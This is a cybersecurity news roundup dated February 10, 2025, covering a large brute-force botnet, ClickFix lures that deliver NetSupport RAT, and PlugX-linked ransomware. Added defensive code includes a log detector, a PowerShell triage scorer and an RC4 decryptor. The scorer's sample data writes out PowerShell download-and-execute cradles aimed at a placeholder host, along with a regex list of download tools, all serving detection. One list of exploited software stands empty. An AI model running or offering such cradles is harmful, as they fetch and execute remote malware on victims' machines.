Massive Cyber Attack, ClickFix Deploys RAT, Hacker Group Attacks – Cybersecurity News [February 10, 2025]

by DuoCircle

 

Cybercriminals are getting smarter, adapting social engineering and ransomware techniques to reach their targets. This week we cover a large-scale brute-force campaign launched from a botnet of roughly 2.8 million IP addresses, and we look at how social engineering is used to get victims to run malicious PowerShell commands themselves.

We also look at a hacking group exploiting publicly known CVEs against targets in more than 15 countries, government staff being tricked into silently installing a remote desktop tool that hands attackers access to critical systems, and, finally, how threat actors turn espionage tooling into profit by hitting smaller businesses (SMEs and SMBs) with ransomware and demanding around $2 million.

 

Password Alert! 2.8 Million Devices Hacked in Massive Cyber Attack

A massive brute-force campaign is being launched from roughly 2.8 million IP addresses against network edge devices, including VPN gateways and firewalls. According to the Shadowserver Foundation, the attacking addresses belong to a botnet of compromised devices used as proxies to guess weak passwords at scale. Once a correct credential is found, the attackers can take control of the device or use it as a foothold into the network behind it. The campaign was spotted as a sharp rise in login brute-forcing attempts against these devices. Given the severity, the FBI has also issued a warning about brute-force attacks on DVRs and web cameras.

How can you stay safe?

  1. Replace short, easily guessed passwords with long, unique passphrases.
  2. Enable multi-factor authentication (MFA), especially on VPN and administrative logins, so a guessed password alone is not enough.
  3. Apply all available security patches and keep firmware up to date.
  4. Disable the accounts and credentials of former employees immediately.
  5. Rate-limit or lock out repeated failed logins, and keep management interfaces off the public internet.

With brute-force attacks on the rise, organizations should layer these controls rather than rely on any one of them, and monitor authentication logs so that an attack is noticed before a password is guessed.
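As an added illustration (not from the original article), here is a small detector for the two patterns described above, run over constructed authentication log lines: a single source hammering one device, and the botnet pattern where one account is tried from many compromised proxy addresses so that no single IP crosses a per-source threshold. It also flags a successful login from a source that was just brute-forcing, which is the moment a guessed password turns into a compromise. The log format, host names and addresses are invented for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed sample log (not real data). The line format imitates a generic
# edge-device syslog entry carrying a result, the user name and the source IP.
SAMPLE_LOG = """\
2025-02-10T10:00:01Z fw-edge auth: FAILED user=admin src=203.0.113.5
2025-02-10T10:00:02Z fw-edge auth: FAILED user=admin src=203.0.113.5
2025-02-10T10:00:03Z fw-edge auth: FAILED user=admin src=203.0.113.5
2025-02-10T10:00:04Z fw-edge auth: FAILED user=admin src=203.0.113.5
2025-02-10T10:00:05Z fw-edge auth: FAILED user=admin src=203.0.113.5
2025-02-10T10:00:06Z fw-edge auth: OK user=admin src=203.0.113.5
2025-02-10T10:01:00Z fw-edge auth: FAILED user=vpnuser src=198.51.100.1
2025-02-10T10:01:10Z fw-edge auth: FAILED user=vpnuser src=198.51.100.2
2025-02-10T10:01:20Z fw-edge auth: FAILED user=vpnuser src=198.51.100.3
2025-02-10T10:01:30Z fw-edge auth: FAILED user=vpnuser src=198.51.100.4
2025-02-10T10:02:00Z fw-edge auth: FAILED user=bob src=192.0.2.10
2025-02-10T10:02:05Z fw-edge auth: OK user=bob src=192.0.2.10
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) auth: (?P<result>FAILED|OK) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_line(line):
    """Return (timestamp, result, user, src), or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, m["result"], m["user"], m["src"]


def detect_bruteforce(lines, window=timedelta(minutes=5), per_src=5, distinct_src=3):
    """Sliding-window detector for three patterns.

    noisy_sources         : one IP produces >= per_src failures inside `window`
                            (classic single-host brute force)
    distributed_targets   : one account is hit from >= distinct_src different IPs
                            inside `window`, even if each IP stays under per_src
                            (the botnet / proxy-network pattern)
    success_after_failures: a successful login from an IP already flagged noisy,
                            i.e. the credential was probably guessed
    """
    src_fail = defaultdict(deque)   # src  -> timestamps of recent failures
    user_fail = defaultdict(deque)  # user -> (timestamp, src) of recent failures
    out = {"noisy_sources": set(), "distributed_targets": set(),
           "success_after_failures": set()}

    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, src = parsed

        # Expire failures that fell out of the window before evaluating.
        q = src_fail[src]
        while q and ts - q[0] > window:
            q.popleft()

        if result == "FAILED":
            q.append(ts)
            if len(q) >= per_src:
                out["noisy_sources"].add(src)

            uq = user_fail[user]
            uq.append((ts, src))
            while uq and ts - uq[0][0] > window:
                uq.popleft()
            if len({s for _, s in uq}) >= distinct_src:
                out["distributed_targets"].add(user)
        else:
            # A success from a source that was just failing repeatedly is the
            # signal that matters: the password has been found.
            if src in out["noisy_sources"] and q:
                out["success_after_failures"].add((user, src))
    return out


if __name__ == "__main__":
    for name, hits in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{name}: {sorted(hits)}")
```

The per-account check is the one that catches the campaign in the article: with 2.8 million sources each trying only a handful of passwords, a per-IP threshold alone never fires. Thresholds and window are deliberately parameters; tune them to the device's normal failure rate.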

 

Attackers Use ClickFix To Deploy Malicious NetSupport RAT

A simple but effective social engineering technique called ClickFix is gaining traction among threat actors. The attacker injects a fake CAPTCHA page into a compromised website; the "verification" steps tell the visitor to copy a command, paste it (typically into the Windows Run dialog) and press Enter, so the victim runs a malicious PowerShell command by hand. That command downloads and installs NetSupport RAT from a remote server. The loader hides its payload inside PNG image files to evade detection. Once NetSupport RAT is installed, attackers can:

  • Monitor the screen, control the device, and issue commands.
  • Download and upload files.
  • Capture confidential and personal (PII) data.
  • Record keystrokes, audio, and video without the user noticing.

ClickFix is not limited to NetSupport RAT: it is also used to deliver an updated Lumma Stealer, which now encrypts its command-and-control (C2) configuration with ChaCha20 to hinder detection and analysis. In both cases no software vulnerability is exploited; the victim is manipulated into installing the malware by running the command on their own machine.

 

Alleged Hacker Group Involved In Global Cyber Attacks For Years

Microsoft has revealed that a subgroup of an infamous hacking group has allegedly been behind cyber-attacks in more than 15 countries. The subgroup targets government and critical-infrastructure organizations worldwide in a long-running campaign that Microsoft calls "BadPilot."

Telecom, shipping, energy and national government organizations have all been on the target list. For initial access the attackers exploit publicly known vulnerabilities (CVEs) in enterprise software such as:

Once inside, they steal credentials and escalate privileges using stealthy, persistent techniques. Microsoft's threat intelligence team also ties the activity to abuse of infrastructure, such as trojanized software distributed as legitimate updates.

The latest evidence includes a new RDP backdoor, Kalambur, which exposes compromised systems over the Tor network. Organizations must harden their controls, patch faster, and stay alert to social engineering as these attacks evolve.

 

Alleged Hackers Exploit PowerShell Trick To Hack Devices

PowerShell has become a favourite entry point for gaining a foothold and installing malware on victims' systems. Microsoft Threat Intelligence recently revealed that a well-known attacker group is allegedly tricking government personnel into running malicious PowerShell code by hand, using spear-phishing emails with PDF attachments.

The PDF directs the victim to a malicious "registration" link that tells them to open PowerShell as administrator and paste a command. That command downloads a remote desktop tool and registers it with a hard-coded PIN and certificate, giving the attackers complete remote access to the system without exploiting any software flaw. Here is how you can safeguard your information assets:

  • Enforce MFA (multi-factor authentication) on accounts and systems.
  • Apply role-based access control (RBAC) so a compromised user cannot reach everything.
  • Audit suspicious or unused accounts and revoke them where needed.
  • Never run PowerShell commands copied from emails, PDFs or unfamiliar websites, and restrict who can run PowerShell as administrator.
  • Turn on PowerShell script block logging so that pasted commands are recorded and can be alerted on.
  • Keep firmware and software up to date.
  • Apply security patches promptly to close known vulnerabilities.

Social engineering has become attackers' primary technique: the victim is talked into running the payload and handing over remote access. Organizations must stay vigilant as these lures become increasingly convincing.
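Both the ClickFix lure described earlier and the PDF spear-phishing above end the same way: the victim pastes a PowerShell one-liner, so the defender's best telemetry is the resulting process creation event (Sysmon Event ID 1 or Windows Event ID 4688) and, for commands typed into an already-open PowerShell, script block logging (Event ID 4104). The following is an added example, not code from the article or from any vendor, of a triage scorer for such events: it decodes an -EncodedCommand payload (base64 of UTF-16LE, which is why naive base64 tools show garbage), looks for hidden-window, policy-bypass and download-cradle indicators, and treats PowerShell spawned by explorer.exe (the Run dialog or Start menu) as the launch path a pasted command would take. The events, the example.invalid URL and the indicator weights are constructed for this example.

```python
import base64
import re

# Constructed samples (not real telemetry). The base64 payload is built here
# from a harmless placeholder URL; example.invalid never resolves.
CRADLE = "iex (iwr 'http://example.invalid/v.txt' -UseBasicParsing)"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

CLICKFIX_EVENT = {  # Sysmon-style process creation: pasted into Win+R "Run"
    "ParentImage": r"C:\Windows\explorer.exe",
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": f"powershell.exe -w hidden -nop -ep bypass -enc {ENCODED}",
}
ADMIN_EVENT = {  # an ordinary admin session launched from the Start menu
    "ParentImage": r"C:\Windows\explorer.exe",
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": "powershell.exe -NoExit -Command Get-Service",
}
# The PDF-lure variant: typed into an elevated console, so it shows up as
# script block text (Event ID 4104) rather than a process command line.
PASTED_SCRIPTBLOCK = "$u = 'https://example.invalid/setup.ps1'; iex (irm $u)"

ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

# (name, regex, weight). Weights are this example's own choice, not a standard.
INDICATORS = [
    ("hidden_window", r"-w(?:indowstyle)?\s+h(?:idden)?", 2),
    ("no_profile", r"-nop(?:rofile)?\b", 1),
    ("bypass_policy", r"-e(?:xecutionpolicy|p)\s+bypass", 2),
    ("download_cradle",
     r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
     r"downloadfile|net\.webclient|curl|wget|mshta)\b", 3),
    ("invoke_expression", r"\b(?:iex|invoke-expression)\b", 3),
    ("encoded_command", ENC_RE.pattern, 1),
]
SUSPICIOUS_THRESHOLD = 5


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent/undecodable.
    PowerShell expects base64 of UTF-16LE, not UTF-8."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_text(text):
    """Score any PowerShell text (command line or script block) against INDICATORS."""
    score, reasons = 0, []
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, text, re.I):
            score += weight
            reasons.append(name)
    return score, reasons


def triage(event):
    """Score a process-creation event. Returns (score, reasons, decoded_payload)."""
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    # Scan the decoded payload too; the cradle usually lives only in there.
    score, reasons = score_text(cmd if decoded is None else cmd + "\n" + decoded)
    parent = event.get("ParentImage", "").lower()
    if parent.endswith("\\explorer.exe") and "powershell" in event.get("Image", "").lower():
        score += 1
        reasons.append("shell_launched_powershell")
    return score, reasons, decoded


def is_suspicious(event):
    return triage(event)[0] >= SUSPICIOUS_THRESHOLD


if __name__ == "__main__":
    for label, ev in (("clickfix", CLICKFIX_EVENT), ("admin", ADMIN_EVENT)):
        print(label, triage(ev)[:2])
    print("scriptblock", score_text(PASTED_SCRIPTBLOCK))
```

The encoded-command indicator alone carries a low weight on purpose: legitimate management tooling uses -EncodedCommand constantly, and it is the combination with a hidden window, an execution-policy bypass and a download-and-execute cradle that distinguishes a pasted lure from routine administration.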

 


 

Ransomware Attack Leading To Huge Data Recovery Costs

A threat group allegedly used state-linked espionage tooling to carry out a ransomware attack on a software and services company in Asia, demanding a $2 million ransom. Initial access came through a publicly known vulnerability in Palo Alto Networks PAN-OS (CVE-2024-0012). The attackers then deployed the PlugX (Korplug) backdoor through DLL sideloading, with RC4-encrypted payloads, and routed their communications through an NPS proxy, giving them a covert foothold from which to collect sensitive data and stage the ransomware.

Impacts of this ransomware attack:

  • The attack made the victim's IT infrastructure inoperable and disrupted crucial business operations.
  • The $2 million ransom demand, on top of restoration work, made data recovery very costly.
  • The backdoor may also have been used to steal sensitive data, including PII.

This shows how state-linked attackers can profit from tooling built for espionage by reusing it for ransomware. Organizations should prioritize patch management (the PAN-OS flaw was already public), network segmentation, threat detection that catches DLL sideloading and unexpected proxy traffic, and tested backups so that paying the ransom is not the only way back.
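The passage above mentions PlugX being delivered with RC4-encrypted payloads. The following is an added example (not code from the article or from any PlugX sample) of how an analyst recovers such a payload once a candidate key has been pulled out of the sideloaded loader: a plain RC4 implementation, checked against the standard published test vectors, and a candidate-key loop that accepts a key only when the decrypted bytes look like a PE image. The payload, key and candidate list are constructed for the demonstration; real PlugX samples differ in where the key is stored and the blob may be further compressed, which this example does not reproduce.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """RC4: key scheduling (KSA) then keystream generation (PRGA) XORed over
    data. Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Constructed stand-in for a sideloaded payload: an MZ header, the DOS-stub
# string every PE carries, and deterministic filler. It is not a real DLL.
FAKE_PAYLOAD = (b"MZ\x90\x00" + b"\x00" * 60
                + b"This program cannot be run in DOS mode.\r\n"
                + bytes(range(256)))
KEY = b"constructed-demo-key"        # assumption: a key recovered from a loader
ENCRYPTED_PAYLOAD = rc4(KEY, FAKE_PAYLOAD)


def looks_like_pe(data: bytes) -> bool:
    """Plausibility check for a decrypted PE/DLL. 'MZ' alone matches a wrong
    key about 1 in 65536 times; the DOS-stub string makes that negligible."""
    return data[:2] == b"MZ" and b"This program cannot be run in DOS mode" in data[:512]


def recover_payload(blob: bytes, candidate_keys):
    """Try each candidate key (strings carved from the loader, config blobs,
    etc.) and return (key, plaintext) for the first one yielding a PE image."""
    for key in candidate_keys:
        if not key:
            continue                      # RC4 with an empty key is undefined
        plain = rc4(key, blob)
        if looks_like_pe(plain):
            return key, plain
    return None


if __name__ == "__main__":
    hit = recover_payload(ENCRYPTED_PAYLOAD, [b"wrong", b"", KEY])
    print("recovered with key:", hit[0] if hit else None)
```

RC4 is tiny, symmetric and dependency-free, which is exactly why loaders still use it; the flip side for defenders is that once the key is carved from the loader (or brute-forced from a short candidate list as above), decrypting the dumped blob costs nothing.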
